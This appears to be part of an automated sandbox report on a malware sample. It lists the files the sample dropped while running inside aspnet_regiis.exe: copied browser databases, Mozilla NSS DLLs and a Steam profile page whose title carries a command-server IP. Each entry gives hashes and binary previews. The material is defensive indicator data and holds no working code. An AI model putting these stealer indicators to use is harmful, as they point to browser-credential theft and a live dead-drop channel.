                                                                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\EBAFBG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\EBAFBG-shm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\ECBGCB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10237
                                                                                                                                                                  Entropy (8bit):5.498288591230544
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                  MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                  SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                  SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                  SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\FHDAFI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\GIECFI

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\IJKFCF

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):51200
                                                                                                                                                                  Entropy (8bit):0.8745947603342119
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\KFHCAE

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\BGCAAFHIEBKJ\KFHCAE-shm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                  Entropy (8bit):0.017262956703125623
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                  MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                  SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                  SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                  SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\IEHCAKKJDB.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.8150724101159437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:+MEM:+BM
                                                                                                                                                                  MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                  SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                  SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                  SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Unknown error

                                                                                                                                                                  C:\ProgramData\freebl3.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):685392
                                                                                                                                                                  Entropy (8bit):6.872871740790978
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                  MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                  SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                  SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                  SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\mozglue.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):608080
                                                                                                                                                                  Entropy (8bit):6.833616094889818
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                  MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                  SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                  SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                  SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: 66fb252fe232b_Patksl.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\msvcp140.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):450024
                                                                                                                                                                  Entropy (8bit):6.673992339875127
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                  MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                  SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                  SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                  SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\nss3.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):2046288
                                                                                                                                                                  Entropy (8bit):6.787733948558952
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                  MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                  SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                  SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                  SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\softokn3.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):257872
                                                                                                                                                                  Entropy (8bit):6.727482641240852
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                  MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                  SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                  SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                  SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\ProgramData\vcruntime140.dll

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):80880
                                                                                                                                                                  Entropy (8bit):6.920480786566406
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                  MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                  SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                  SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                  SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):42
                                                                                                                                                                  Entropy (8bit):4.0050635535766075
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                  MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                  SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                  SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                  SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\a43486128347[1].exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                  Entropy (8bit):2.8150724101159437
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:+MEM:+BM
                                                                                                                                                                  MD5:AEE9784C03B80D38D3271CDE2B252B8D
                                                                                                                                                                  SHA1:E5FD9AA24C9417E7332E6F25936AE2A6EC8F1524
                                                                                                                                                                  SHA-256:27C2CCD962C2B8DCCB52FE3688AB236F186F7A41FD57D810478712048E9AD3F8
                                                                                                                                                                  SHA-512:A83C2F678A77228F5C7F2FB61A723217892B8422913739D1C65CB97701C341361EEEE617E9D050A86B552DB4DD87B18CFB94443977A75A5862171346609E9472
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:Unknown error

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199780418869[1].htm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34879
                                                                                                                                                                  Entropy (8bit):5.398984021038028
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2q:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtP+
                                                                                                                                                                  MD5:CB474CD24A9B82E2E77E067A1FC97F31
                                                                                                                                                                  SHA1:DDF7609BAAF037C4B074BA9193FE8E0D2EC9CFDE
                                                                                                                                                                  SHA-256:AD200D9A054496C714D8BB623D97B9249FB6A26892A420BC18BE35A0643C5DEF
                                                                                                                                                                  SHA-512:61218F8A37D6541D2CABC95253987F2BCE95AF567B3DC29B0465BA523F8F2B46A9FAC3C9576AFD77A09F27C77A2EC959C5742A8634D4AE9F2C00F9E422E9E977
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

